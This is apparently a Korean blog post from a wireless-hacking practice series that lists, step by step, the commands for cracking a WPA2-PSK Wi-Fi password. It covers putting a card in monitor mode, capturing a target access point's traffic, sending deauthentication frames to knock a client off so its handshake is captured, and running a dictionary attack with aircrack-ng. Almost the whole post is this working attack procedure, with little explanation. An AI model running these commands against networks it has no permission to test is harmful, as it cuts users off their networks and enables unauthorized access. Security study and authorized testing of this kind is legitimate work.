WPA2-PSK Crack은 아쉽게 캡쳐 사진들을 찍지 않아서 명령어만 올려드립니다.
다른 무선 해킹 기법을 해보신 분들은 어떤 내용인지 이해되실거라 생각됩니다.
아쉽지만 명령어만 올려드리는 점 양해 부탁드립니다.
1. airmon-ng start wlan0
모니터링 모드 시작
2. airodump-ng mon0
덤프 시작
여기에서 AP와 Station의 상태를 확인할 수 있다.
3. airodump-ng -w name --bssid APMAC -c channelNUM mon0
덤프와 함께 해당 AP 트래픽 저장
4. aireplay-ng --deauth 1 -a APMAC -c ClientMAC mon0
타겟 AP에 붙은 하나의 스테이션 접속 해제
5. 그럼 재접속과 동시에 3번 창에서 WPA handshake가 뜬다.
그리고 dump종료
6. aircrack-ng 파일이름.cap -w ./사전파일
크랙 시작
7. 크랙되면 화면에 뜸
'Hacking Tech > Wireless Hacking' 카테고리의 다른 글
[무선해킹시리즈 6-2] 암호화 서버 구축 (0) | 2022.09.11 |
---|---|
[무선해킹시리즈 6-1] 802.1x 암호화 프로토콜 (1) | 2022.09.10 |
[무선해킹시리즈 5-3] WPA2의 암호화 알고리즘은? (0) | 2022.09.08 |
[무선해킹시리즈 5-2 해킹실습5] WPA1도 뚫어!! - WPA1 Crack (0) | 2022.09.07 |
[무선해킹시리즈 5-1] WPA1은 또 뭐야? (0) | 2022.09.05 |